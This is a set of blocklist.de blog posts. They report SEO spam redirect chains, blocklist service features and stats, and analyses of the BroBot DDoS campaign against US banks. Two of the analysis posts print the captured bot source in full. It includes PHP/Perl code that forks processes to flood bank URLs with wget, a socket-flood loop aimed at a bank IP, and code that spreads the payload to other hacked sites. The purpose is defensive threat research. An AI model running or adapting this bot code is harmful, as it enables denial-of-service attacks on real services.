2013-06-02

Over 9,181 URLs from an SEO spammer on blog.com (end site: clickbank.com)

In our last „URL reporting“ the spammer mostly used *.pl domains; now we have found over 9,181 URLs on *.blog.com that an SEO spammer abuses to funnel traffic from reputable sites via blog.com to his „money sites“.

On these money sites he offers to make money with ClickBank affiliate programs.

[Screenshots: avervurm.blog.com, four views]

Other blog.com URLs with the same or slightly different content, all of which redirect to clickbank.com:

[Screenshots: grinevaskij1970.blog.com (two views), pirevilka.blog.com]

Some links go to the spammer's „money site“ via tinyurl.com: „hxxp://tinyurl.com/cszvyuf/go8.php?aHR0cDovL2p1bDRvbm9rODUuZWJheWNlcnQuaG9wLmNsaWNrYmFuay5uZXQ=“

and from there to „http://www.jobreplacementformula.com/clickbank.php?hop=codelocker“ or directly to clickbank.com

[Screenshots: jobreplacementformula.com, two views]

On that site, all links go to hxxp://www.lottomasterformula.com like this:

hxxp://www.lottomasterformula.com/dlguard/dlg/sell.php?prodData=cb%2C6

and then on to clickbank.com:

hxxps://ssl.clickbank.net/order/orderform.html?time=1370165174&vvvv=6562617963657274&item=1&detail=Job+Replacement+Formula+67&vvar=detail%3DJob+Replacement+Formula+67%26dlgp%3D6&oaref=01.09B9DCCD9E0E71A5790AC3235281919F0D991A7DEB89597DD4E6AA7D1731DA971A6BC929777E2ED95D5AF51F83B0AA90A0AF6050AB48256725481747D07F78E1ECBF3B2FC242EF671C76543A63F84442719A7B93

There you get an order form to buy the book on how to make money with clickbank.com for only „$67.00“:

[Screenshot: clickbank.com order form]

At the bottom there is the text of a banner containing „codelocker.blogcom“, which was not replaced by JavaScript in the Chrome browser inside our virtual machine:

[Screenshot: clickbank.com, bottom of the page]

We have reported the URLs to blog.com via their ticket system and are waiting for a response. At this point I don't think blog.com uses clickbank.com to place ads on its site.

In most cases of sites with user-generated content, the URLs get disabled or deleted.

Currently we have over 2,677,883 URLs in our database that were posted by spammers into our honeypot systems. Next we will look at how many new URLs come in daily and add an RBL list with these URLs.

If you are interested in these URLs, please contact us.

2013-05-30

DNS-RBL now with the timestamp of the last attack

We have now inserted the Unix timestamp of the last attack we received into the TXT record of the RBL DNS.
We list IPs for 48 hours, but some providers reassign dynamic addresses after 12 hours.
Now you can see when blocklist.de received the last attack from the queried IP.

For example, for the IP 186.241.250.183:
#dig 183.250.241.186.apache.bl.blocklist.de TXT

;; ANSWER SECTION:
183.250.241.186.apache.bl.blocklist.de. 2467 IN TXT "Infected System (Service: apacheddos, Last-Attack: 1369828413), see http://www.blocklist.de/en/view.html?ip=186.241.250.183"

You can parse the Unix timestamp from between "Last-Attack: " and ")".

Another way would be to put the age of the last attack, in hours, into the A record, like this:
127.0.0.x: the last attack is less than one hour old
127.0.2.x: the last attack is about two hours old

Please write in the comments what you think about the second way of putting the age into the A record.
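As an added illustration (not code from blocklist.de), here is how a client could build the reversed query name, pull the timestamp out of the TXT record shown above and apply an age cutoff; the sample record is the post's own example, the 127.0.<hours>.x prefix follows the proposal above, and the 255 cap on the hour octet is an assumption.

```python
import re
import ipaddress
from datetime import datetime, timezone

# Constructed sample TXT payload in the format the post shows; the values are
# the post's own example (IP 186.241.250.183, Last-Attack 1369828413).
SAMPLE_TXT = ('"Infected System (Service: apacheddos, Last-Attack: 1369828413), '
              'see http://www.blocklist.de/en/view.html?ip=186.241.250.183"')

# Pull the service name and the Unix timestamp out of "(Service: ..., Last-Attack: ...)".
TXT_RE = re.compile(r"Service:\s*(?P<service>[^,)]+),\s*Last-Attack:\s*(?P<ts>\d+)\)")


def rbl_query_name(ip: str, zone: str = "apache.bl.blocklist.de") -> str:
    """Build the reversed-octet DNSBL name, e.g. 183.250.241.186.apache.bl.blocklist.de."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def parse_txt(txt: str) -> dict:
    """Return the service and last-attack timestamp carried in the TXT record."""
    m = TXT_RE.search(txt)
    if m is None:
        raise ValueError("TXT record carries no Last-Attack field")
    return {"service": m.group("service").strip(), "last_attack": int(m.group("ts"))}


def attack_age_hours(last_attack: int, now: int) -> float:
    """Age of the last attack in hours, given the current Unix time."""
    return (now - last_attack) / 3600.0


def proposed_a_prefix(age_hours: float) -> str:
    """Encode the age in the third octet as the post proposes (127.0.<hours>.x).
    The 255 cap is an assumption forced by the octet range, not from the post."""
    if age_hours < 0:
        raise ValueError("last attack lies in the future; clock skew?")
    return f"127.0.{min(int(age_hours), 255)}"


def should_block(age_hours: float, max_age_hours: float = 12.0) -> bool:
    """Client-side policy: act only on recent listings, since the post notes that
    some providers reassign dynamic addresses after about 12 hours."""
    return 0 <= age_hours <= max_age_hours


if __name__ == "__main__":
    # A real client would resolve rbl_query_name(...) with a TXT lookup first.
    rec = parse_txt(SAMPLE_TXT)
    now = int(datetime.now(timezone.utc).timestamp())
    age = attack_age_hours(rec["last_attack"], now)
    print(rbl_query_name("186.241.250.183"), rec)
    print(f"age {age:.1f} h -> {proposed_a_prefix(age)}.x, block={should_block(age)}")
```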

2013-04-19

Current stats of BlockList.de (users, MySQL, load, servers, traffic...)

Currently, blocklist.de has the following stats/users:

Users: 853

Servers: 1015

Attacks: 290,425,621

Reports: 4,546,850

Daily mails: ~170100 (lower limit) to ~360000 (upper limit)

Web traffic: ~220 GB

RBL/API traffic: ~70 GB

Mail (in/out) traffic: ~2130 GB. Since 04/2013 we use the local IPs, so the traffic between the reporting servers is no longer included and the traffic is going down.

Traffic over IPv6 (mail, web...): ~6 GB

On top of this come 2.1 TB of traffic between the web/mail servers and the MySQL server. The MySQL server sends out ~3.8 GB each hour.

The MySQL server currently uses 40% of its 32 GB RAM, and the system load averages 1.00.

The web server does not use its full 13 GB of RAM, and the system load is under 0.7. There are ~2000 open connections.

The complete traffic of all systems is roughly 4.2 TB in March 2013.

2013-04-03

brobot starts DDoS again against capitalone.com, chase.com, bbt.com

Since 2013-04-02 18:05 UTC, brobot has been attacking the US banks again.

It now sends the following code and executes it:
[Screenshot: brobot-2013-04-03]

Here is one of the complete code variants (it uses several different ones); we inserted newlines for readability:


function randomvar(){
$a=chr(rand(97,122));
$b=rtrim(base64_encode(rand(100,10000)),'=');
return $a.$b;
}
$url = "http://www.bbt.com/bbtdotcom/financial-education/home_and_residence/accumulate_down_payment.page";
$rand = md5(microtime().rand(0,500));
if(preg_match("/\?/",$url))
$url .= "&".randomvar()."=".substr($rand,0,rand(4,10));
else
$url .= "?".randomvar()."=".substr($rand,0,rand(4,10));
if(!function_exists('scandir'))
{
function scandir($a,$b=false,$c=true)
{
$d=array();
if($e=opendir($a))
{
while(false!==($f=readdir($e)))
{
if(($f!="."&&$f!="..")||$c==true)
{
if($b==false)
if(is_dir($f))
continue;
array_push($d,basename($f));
}
}
closedir($e);
}
return $d;
}
}

function on_exit()
{
echo "###Assassin###\n";
echo "\nuau-repeat";
}

if(function_exists('register_shutdown_function'))
register_shutdown_function("on_exit");

fwrite(fopen($h=tgya8siudj().'/'.md5(microtime()),'w'),
"unlink '$h';
$time=time();
for($i = 0;$i < 100;$i++) { if(fork()) { } else { $j=0;while(time()-$time<120) { $j++; if($j % 100 == 0) { sleep 1; } system("wget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8' -t 45 --delete-after --no-check-certificate '$url' 2>&1 &\");
}
last;
}
}"
); # fwrite Ends

iyiuo("perl $h");
echo "###Assassin###";
echo "\nuau-repeat";

function iyiuo($r)
{
$s="";
if(!empty($r))
{
if(function_exists('exec'))
{
@exec($r,$s);
$s=join("\n",$s);
}
elseif(function_exists('shell_exec'))
$s=@shell_exec($r);
elseif(function_exists('system'))
{
@ob_start();
@system($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($r);
$s=@ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('popen') and @is_resource($t=@popen($r,"r")))
{
$s="";
while(!@feof($t))
$s.=@fread($t,1024);
@pclose($t);
}
elseif(function_exists('proc_open'))
{
$u=proc_open($r,array(array("pipe","r"),array("pipe","w"),array("pipe","w")),$v);
$s=stream_get_contents($v[1]);
fclose($v[0]);
fclose($v[1]);
fclose($v[2]);
proc_close($u);
}
}
return $s;
}

function gyhuijoakosdoj()
{
$j="";
if(!isset($_SERVER["DOCUMENT_ROOT"]))
$_SERVER["DOCUMENT_ROOT"]=substr($_SERVER["SCRIPT_FILENAME"],0,-strlen($_SERVER["SCRIPT_NAME"]));
$k[]=$_SERVER["DOCUMENT_ROOT"];
while($k)
{
$l=array_pop($k);
if($m=scandir($l))
{
$n=0;
while(isset($m[$n]))
{
if($m[$n]!=="."&&$m[$n]!=="..")
{
$o="{$l}/{$m[$n]}";
if(is_dir($o))
{
$k[]=$o;
if(@is_writable($o))
{
return $o;
}
}
}
$n++;
}
}
}
return false;
}

function tgya8siudj()
{
if(@is_writable('/tmp'))
return '/tmp';
elseif(@is_writable(preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME'])))
return preg_replace('/[^\/]*$/','',$_SERVER['SCRIPT_FILENAME']);
elseif(!function_exists("sys_gt_temp_dir"))
{
if(!empty($_ENV["TMP"])and@is_writable($_ENV["TMP"]))
return realpath($_ENV["TMP"]);
elseif(!empty($_ENV["TMPDIR"])and@is_writable($_ENV["TMPDIR"]))
return realpath($_ENV["TMPDIR"]);
elseif(!empty($_ENV["TEMP"])and@is_writable($_ENV["TEMP"]))
return realpath($_ENV["TEMP"]);
else
{
$a=gyhuijoakosdoj();
if($a==!false)
return $a;
$p=tempnam(md5(uniqid(rand(),TRUE)),"");
if($p)
{
$q=realpath(dirname($p));
@unlink($p);
return $q;
}
else
return false;
}
}
else
return sys_get_temp_dir();
}
exit;

Complete code, formatted

It now ships its own „scandir“ function for the case that the built-in function does not exist or is disabled.
And it now tries to run the DDoS via exec with wget, proc_open and other functions, but no longer via fsockopen or streams.
Are there too many systems without socket support?
Update: here is a code variant with sockets

The hackers have announced a new phase: „Phase3/W5 Operation Ababil“

2013-03-22

In the last days, the BroBot runners have started a new wave and are sending POST requests with a c_id parameter to the hacked sites.

The base64-encoded data contains the following script/data:

[Screenshot: brobot-runners]

The script calls 140 to 180 other hacked URLs in each POST request:

[Screenshot: brobot-runners2]

....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
}    else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....

We have currently found 3357 URLs of hacked Joomla installations/sites.

Over 2,500 scripts/URLs are online. In the next days we will report the sites to Bank of America or directly to the hosters so they can check and fix them.

In the next days we will analyse the complete PHP code and write a bit about what is not good and could be done better 🙂

If you want the complete code, please contact us.

2013-03-19

The servers that send reports to blocklist and their timezones/locations

We currently have the following servers with the following timezones (locations):

Count, timezone (ordered by count, descending):

662 Europe/Berlin
29 Europe/London
26 Europe/Amsterdam
25 Europe/Zurich
18 Europe/Vienna
18 Europe/Paris
15 Europe/Rome
13 Europe/Copenhagen
11 GMT+0000
10 America/Los_Angeles
8 America/New_York
7 Europe/Madrid
5 Europe/Helsinki
5 America/Chicago
4 Pacific/Auckland
4 America/Toronto
4 Asia/Kolkata
3 Asia/Vientiane
3 Asia/Tehran
3 Australia/Sydney
3 Europe/Moscow
3 Europe/Prague
2 Europe/Riga
2 America/Phoenix
2 Europe/Bratislava
2 Australia/Brisbane
2 Asia/Manila
2 Asia/Jakarta
1 Europe/Istanbul
1 Europe/Bucharest
1 Australia/Hobart
1 Europe/Luxembourg
1 America/Mexico_City
1 Europe/Lisbon
1 America/Montreal
1 Europe/Ljubljana
1 Asia/Bangkok
1 Asia/Shanghai
1 America/Denver
1 Europe/Warsaw
1 Asia/Singapore
1 Asia/Hong_Kong
1 Europe/Volgograd
1 America/Sao_Paulo
1 Europe/Kiev
1 Asia/Brunei
1 Europe/Athens

Count, timezone (ordered by timezone, ascending):


5 America/Chicago
1 America/Denver
10 America/Los_Angeles
1 America/Mexico_City
1 America/Montreal
8 America/New_York
2 America/Phoenix
1 America/Sao_Paulo
4 America/Toronto
1 Asia/Bangkok
1 Asia/Brunei
1 Asia/Hong_Kong
2 Asia/Jakarta
4 Asia/Kolkata
2 Asia/Manila
1 Asia/Shanghai
1 Asia/Singapore
3 Asia/Tehran
3 Asia/Vientiane
2 Australia/Brisbane
1 Australia/Hobart
3 Australia/Sydney
26 Europe/Amsterdam
1 Europe/Athens
662 Europe/Berlin
2 Europe/Bratislava
1 Europe/Bucharest
13 Europe/Copenhagen
5 Europe/Helsinki
1 Europe/Istanbul
1 Europe/Kiev
1 Europe/Lisbon
1 Europe/Ljubljana
29 Europe/London
1 Europe/Luxembourg
7 Europe/Madrid
3 Europe/Moscow
18 Europe/Paris
3 Europe/Prague
2 Europe/Riga
15 Europe/Rome
18 Europe/Vienna
1 Europe/Volgograd
1 Europe/Warsaw
25 Europe/Zurich
11 GMT+0000
4 Pacific/Auckland

Old servers that have no location/timezone, or that only ever sent reports from services whose logs contain no timezone, are not listed here.

2013-01-26

We saw the first DDoS against ns1.google.com and Bank of America on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The hacker abused old installations of „bluestork“ templates and old WordPress sites.

He uploaded the complete script and called it via GET parameters to start it.

Then he switched to uploading only HTML forms via old Joomla installations < 2.5.7 (mostly through the JCE editor) and used the GIF flaw in PHP and in the script (the upload script has a GIF header and binary code in its first lines).

The „file“ program and Linux say it is a GIF image, but after the header it contains normal PHP code.
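An added example (not from the post): a small scanner a site owner can run over an upload directory to flag files that start with a GIF header but carry a PHP open tag later on, the layout described above; the sample blobs are constructed, and the 64 KB inspection window is an assumption.

```python
import os
import re
from typing import List

# Magic bytes that file(1) keys on for GIF images.
GIF_MAGICS = (b"GIF87a", b"GIF89a")
# PHP open tags that must not appear in something claiming to be an image.
PHP_TAG_RE = re.compile(rb"<\?php|<\?=|<script\s+language\s*=\s*['\"]?php", re.IGNORECASE)


def is_gif_php_polyglot(data: bytes) -> bool:
    """True if the data starts with a GIF header but carries a PHP open tag after it."""
    if not data.startswith(GIF_MAGICS):
        return False
    return PHP_TAG_RE.search(data, len(GIF_MAGICS[0])) is not None


def scan_tree(root: str, head_bytes: int = 64 * 1024) -> List[str]:
    """Walk an upload or web root and return paths of GIF/PHP polyglot files.
    Only the first head_bytes of each file are inspected (assumption: the PHP
    payload follows the header closely, as in the uploader described above)."""
    hits: List[str] = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    head = fh.read(head_bytes)
            except OSError:
                continue  # unreadable file; skip rather than abort the scan
            if is_gif_php_polyglot(head):
                hits.append(path)
    return hits


# Constructed samples (not from the post): a minimal 1x1 GIF, the same GIF with
# PHP appended in the described layout, and a plain PHP file for contrast.
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04\x01"
             b"\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
POLYGLOT = CLEAN_GIF + b"\n<?php /* placeholder, no real payload */ echo 'x'; ?>\n"
PLAIN_PHP = b"<?php echo 'hello'; ?>\n"

if __name__ == "__main__":
    for label, blob in (("clean gif", CLEAN_GIF), ("polyglot", POLYGLOT), ("plain php", PLAIN_PHP)):
        print(f"{label:10s} polyglot={is_gif_php_polyglot(blob)}")
    # To check a real directory, pass your own upload path to scan_tree(...).
```

The check complements, rather than replaces, a server-side rule that never lets uploaded files execute as PHP.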

Via the upload script he uploads another small script and sends the data via POST, base64-encoded; the complete data from one of the POST fields, $_REQUEST['mjdu'], was an eval(base64_decode(...)) call whose payload decodes to the script below.



 

Decoded, it reads:


$iii='171.161.199.100';
$ppp='443';
$ddd='3600';
$sstt='30';
$rrtt='5';
$ppss='3';
if(file_exists("stext.txt"))
{
$ffp=fopen("stext.txt","r");
$rr=fread($ffp,8);
fclose($ffp);
if($rr=="NoTtExTrUn")
{
$ffp2=fopen("stext.txt","w+");
fclose($ffp2);
unlink("stext.txt");
exit();
die();
}
unlink("stext.txt");
}
$step_time=time()+$sstt;
$release_time=time()+$rrtt;
 
if(isset($_REQUEST['time_e']))
{
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$ddd;
}
$out=str_repeat(".", $ppss);
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$data1['mjdu']=$_REQUEST['mjdu'];
$data1['psbt']=$_REQUEST['psbt'];
$data1['time_e']=$max_time;
$ch1 =@curl_init();
curl_setopt($ch1,CURLOPT_URL,$address_host);
curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch1,CURLOPT_HEADER,1);
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,10);
curl_setopt($ch1,CURLOPT_POST, true);
curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
curl_exec($ch1);
curl_close($ch1);
}
if(time() > $step_time)
{
@exit();
@die();
}
$socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_set_write_buffer($socket, 0);
@stream_socket_sendto($socket,$out);
}
@fclose($socket);;
}
$ffp2=fopen("stext.txt","w+");fclose($ffp2);unlink("stext.txt");

Why does he use both
@exit();
and
@die();
? One of them is enough 😉 die() is the same as exit() ->
the die() function on php.net

[Screenshot: brobot-ddos-01-2013]

There was better code after the first script, in which he uses the curl functions again and again. For such code you would normally use functions to avoid duplicated code 🙂

On 22.01.2013 we found over 250 abused Joomla installations.

Today (25.01.2013) he is hacking Joomla installations with a version below 2.5.8 and WordPress sites with older plugins like Akismet version 2.5.5.

It is necessary to update your installations very quickly, or your server will attack US financial institutions 🙂

Think about it: with over 250 hacked sites on the servers of just one hoster creating a DDoS, you have a lot of power and bandwidth, and we think there are very large numbers of old Joomla installations on servers around the world 🙂

2013-01-16

Blackhat SEO spam from *.pl domains hosted at OVH on 178.33.177.193

In the last days and weeks we have received a very large list of SEO/spam URLs with .pl domains like these:

http://38291.8gx5zj6a7.pl/

http://20851.y5pcbti2p.pl/

http://10533.m6lkmh37r.pl/

http://35754.igzkbz6j1.pl/

Now the spammer has changed servers. The domains now resolve to the IP 178.33.177.193, hosted on an OVH system.

For the spam URLs we send an X-ARF report via spamlinks.blocklist.de to the abuse department so they can look at the spam URL. We only send a report when the spam score is high enough, so the false-positive rate is under 5%.

We recommend blocking the IP in all firewalls and gateways.

2013-01-10

In the last days we have seen 13 IPs from the network MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp // ASN8075 in a lot of forum spam, SSH, VoIP and SIP attacks.

We sent the default X-ARF abuse complaint, but only the server making the SSH/SIP attacks was stopped or is no longer reported to us.

So we sent a normal mail to noc@microsoft.com, abuse@microsoft… abuse@msn…, but received only the acknowledgement mail and a bounce from noc@ saying the account does not exist, although it is listed in the whois data.

On the servers the RDP port is open:

[Screenshot: nmap-ms]

We think these are development systems that were hacked or misconfigured, so that they have a (reverse) proxy which allows fetching URLs from other hosts and not only from the same system.

Some IPs were heavy hitters: the IP 157.56.166.51, for example, sent over 760400 spam comments/posts or automatic registrations to our honeypot systems. Most IPs were stopped or were no longer reported to us after yesterday, but one IP is still active.

We are still waiting for an answer from Microsoft 😐

[UPDATE 22.07.2013 11:00:00]
We received an answer from Microsoft:

Hello,

Thank you for bringing this to our attention, please file a response to
http://cert.microsoft.com. Then our security teams will start that
investigation, also you can use that in the future to report suspicious
Microsoft IPs.

Thank you,

Rechie
Online Safety Team

We tried to send a report, but only got the following error message:
An internal error has occured, please try again. Object reference not set to an instance of an object.
With a fake Referer header the form works.
But dear Microsoft, please use an X-ARF parser and generate your own report format from your form.

2013-01-02

Reporting attackers to blocklist via HTTP (GET/POST) (without Fail2Ban/DenyHosts/mails)

We have just put the BETA of the HTTP API online:

http://www.blocklist.de/de/httpreports.html

Through it you can report data to BlockList.de with e.g. curl/lynx/wget and do not need to install a mail system on the server.

The call requires the following data:

  • server e-mail address or ID
  • server API key
  • attacker IP
  • attacked service (ssh, imap, ftp...)
  • log files
  • format (xml, json, text, php)

Then you can send the data via POST/GET:

curl -s "http://www.blocklist.de/de/httpreports.html?server=$email@server.tld&apikey=$apikey&ip=$angreiferIP&service=$dienst&logs=urlencode($logs)&format=php"

Depending on the return format, you get the variables status and error:

xml:

<status>success</status>

<error>0</error>

If status contains success, everything went fine.

Otherwise the variable $error is not 0 and, depending on the kind of error, contains it like this:

<server>API-Key stimmt nicht mit dem Server ueberein.</server>

<status>error</status>

Since it is not yet really field-tested and has so far only been tested by me, there may still be bugs. Please report all bugs or wishes to us. Thanks!
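An added example (not blocklist.de's own client code), in Python rather than curl: it builds the report URL from the parameters listed above, url-encodes the log lines, and evaluates the status/error elements of the XML reply; the server address, API key and log line are placeholders, and the reply is wrapped in a root element here (an assumption) because the post shows bare elements.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlencode

API_URL = "http://www.blocklist.de/de/httpreports.html"


def build_report_url(server: str, apikey: str, ip: str, service: str,
                     logs: str, fmt: str = "xml") -> str:
    """Assemble the GET form of the report call; urlencode() takes care of the logs."""
    params = {"server": server, "apikey": apikey, "ip": ip,
              "service": service, "logs": logs, "format": fmt}
    return API_URL + "?" + urlencode(params)


def parse_xml_reply(body: str) -> dict:
    """Evaluate the XML reply: success needs <status>success</status> and error 0.
    The post shows bare elements, so a root element is wrapped around them here
    (assumption) to give the parser a well-formed document."""
    root = ET.fromstring("<reply>" + body + "</reply>")
    status = (root.findtext("status") or "").strip()
    # Every element other than <status> describes an error; its tag names the
    # error kind (e.g. <server>...</server> for a key/server mismatch).
    errors = {el.tag: (el.text or "").strip() for el in root if el.tag != "status"}
    ok = status == "success" and errors.get("error", "0") == "0"
    return {"ok": ok, "status": status, "errors": errors}


def send_report(url: str, fetch=None) -> dict:
    """Send the report and parse the answer. `fetch` is injectable so the
    function can be exercised offline; by default urllib is used."""
    if fetch is None:
        from urllib.request import urlopen

        def fetch(u):
            return urlopen(u, timeout=10).read().decode("utf-8")
    return parse_xml_reply(fetch(url))


# Constructed replies mirroring the two cases shown in the post.
OK_REPLY = "<status>success</status>\n<error>0</error>"
ERR_REPLY = ("<server>API-Key stimmt nicht mit dem Server ueberein.</server>\n"
             "<status>error</status>")

if __name__ == "__main__":
    # Placeholders: use your own server address, API key and a real log excerpt.
    url = build_report_url("admin@server.example", "APIKEY_PLACEHOLDER", "192.0.2.10", "ssh",
                           "Jan  2 10:00:01 host sshd[1234]: Failed password for root "
                           "from 192.0.2.10 port 4444 ssh2")
    print(url)
    print(send_report(url, fetch=lambda u: OK_REPLY))
    print(send_report(url, fetch=lambda u: ERR_REPLY))
```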
